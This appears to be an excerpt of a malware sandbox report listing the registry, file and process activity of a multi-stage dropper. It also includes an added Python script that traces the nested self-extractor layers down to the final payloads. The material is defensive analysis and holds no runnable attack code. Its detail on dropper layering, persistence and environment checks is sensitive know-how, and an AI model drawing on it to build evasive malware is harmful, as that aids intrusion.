Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\uS3Ep0xD.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\IG0cq8AC.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\bL1tU9by.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Qh9By1xf.exe N/A
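
The five RunOnce entries above are not the malware's own persistence mechanism: wextract_cleanupN values are written by wextract.exe, the stub inside IExpress self-extracting packages, so that rundll32.exe advpack.dll,DelNodeRunDLL32 deletes its %TEMP%\IXPnnn.TMP directory at the next logon (the WOW6432Node path shows the stubs are 32-bit). Because each entry's writing process is the stub of one layer and the quoted directory is where that stub unpacked the next layer, the rows can be chained to read off the unpacking depth. The Python below is an added example rather than sandbox code; the row data is copied from this page with the report's doubled backslashes collapsed, and the executed-path list is taken from the "Executes dropped EXE" section.

```python
r"""Reconstruct the nested self-extractor chain from the RunOnce rows above.

Added example, not code from the sandbox. Background used here: wextract.exe,
the stub inside IExpress packages, unpacks to %TEMP%\IXPnnn.TMP and registers
RunOnce\wextract_cleanupN = rundll32.exe advpack.dll,DelNodeRunDLL32 "<dir>"
so that directory is deleted at the next logon. The writing process of each
row is one layer's stub; the quoted directory holds the next layer.
"""
import re
from typing import List, Sequence, Tuple

Row = Tuple[str, str, str]          # (value name, value data, writing process)
Layer = Tuple[str, str]             # (stub executable, directory it unpacked into)

# Copied from the five "Adds Run key" rows in this report.
RUNONCE_ROWS: List[Row] = [
    ("wextract_cleanup0",
     r'rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\"',
     r"C:\Users\Admin\AppData\Local\Temp\62CC.exe"),
    ("wextract_cleanup1",
     r'rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\"',
     r"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\uS3Ep0xD.exe"),
    ("wextract_cleanup2",
     r'rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\"',
     r"C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\IG0cq8AC.exe"),
    ("wextract_cleanup3",
     r'rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\"',
     r"C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\bL1tU9by.exe"),
    ("wextract_cleanup4",
     r'rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\"',
     r"C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Qh9By1xf.exe"),
]

# Copied from the "Executes dropped EXE" rows that sit inside the IXP chain.
EXECUTED = [
    r"C:\Users\Admin\AppData\Local\Temp\62CC.exe",
    r"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\uS3Ep0xD.exe",
    r"C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\IG0cq8AC.exe",
    r"C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\bL1tU9by.exe",
    r"C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Qh9By1xf.exe",
    r"C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1hU83ic7.exe",
    r"C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2ZD054Xl.exe",
]

_CLEANUP = re.compile(r'DelNodeRunDLL32\s+"([^"]+?)\\?"', re.I)
_INDEX = re.compile(r"(\d+)$")

def extraction_dir(value_data: str) -> str:
    """Directory the cleanup command will delete, without the trailing backslash."""
    m = _CLEANUP.search(value_data)
    if not m:
        raise ValueError(f"not a wextract cleanup command: {value_data!r}")
    return m.group(1)

def build_chain(rows: Sequence[Row]) -> List[Layer]:
    """Layers from outermost inward, checking each stub lives in the previous layer's directory."""
    ordered = sorted(rows, key=lambda r: int(_INDEX.search(r[0]).group(1)))
    chain: List[Layer] = []
    for name, data, writer in ordered:
        target = extraction_dir(data)
        if chain:
            parent_dir = chain[-1][1]
            if not writer.lower().startswith(parent_dir.lower() + "\\"):
                raise ValueError(f"{name}: {writer} is not inside {parent_dir}")
        chain.append((writer, target))
    return chain

def innermost_payloads(chain: Sequence[Layer], executed: Sequence[str]) -> List[str]:
    """Executables run from the deepest extraction directory: the real payloads."""
    leaf = chain[-1][1].lower() + "\\"
    return sorted(p for p in executed if p.lower().startswith(leaf))

if __name__ == "__main__":
    chain = build_chain(RUNONCE_ROWS)
    for depth, (stub, target) in enumerate(chain):
        print(f"layer {depth}: {stub} -> {target}")
    print("innermost payloads:", innermost_payloads(chain, EXECUTED))
```

On this report the chain runs five layers deep, from 62CC.exe in Temp down to IXP004.TMP, and the only executables shown running from IXP004.TMP are 1hU83ic7.exe and 2ZD054Xl.exe; those are the files to pull for static analysis, since every outer layer is just a wextract stub. The consistency check matters when rows are missing or come from two different detonations: a stub that does not live in the previous layer's directory means the entries belong to separate packages, not one nested chain.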

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Google\Chrome\updater.exe C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A

Launches sc.exe

5 launches of C:\Windows\System32\sc.exe; command lines are not recorded in the report.

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Roaming\bvtrhjj N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Roaming\bvtrhjj N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Roaming\bvtrhjj N/A

Creates scheduled task(s)

persistence
1 launch of C:\Windows\SysWOW64\schtasks.exe; task details are not recorded in the report.

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-281 = "Central Europe Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-215 = "Pacific Standard Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2372 = "Easter Island Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-351 = "FLE Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-572 = "China Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2611 = "Bougainville Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-271 = "Greenwich Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2041 = "Eastern Daylight Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-731 = "Fiji Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2772 = "Omsk Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2841 = "Saratov Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2162 = "Altai Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-142 = "Canada Central Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2631 = "Norfolk Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2002 = "Cabo Verde Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-172 = "Central Standard Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-751 = "Tonga Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2181 = "Astrakhan Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-341 = "Egypt Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-342 = "Egypt Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2001 = "Cabo Verde Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2412 = "Marquesas Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1872 = "Russia TZ 7 Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-211 = "Pacific Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-3142 = "South Sudan Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-251 = "Dateline Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-435 = "Georgian Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-31 = "Mid-Atlantic Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2792 = "Novosibirsk Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-131 = "US Eastern Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1822 = "Russia TZ 1 Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = "Pacific SA Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-672 = "AUS Eastern Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-721 = "Central Pacific Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-32 = "Mid-Atlantic Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-384 = "Namibia Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1932 = "Russia TZ 11 Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-532 = "Sri Lanka Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-451 = "Caucasus Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-262 = "GMT Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-742 = "New Zealand Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2341 = "Haiti Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2512 = "Lord Howe Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-501 = "Nepal Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-201 = "US Mountain Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-411 = "E. Africa Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-434 = "Georgian Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bvtrhjj N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
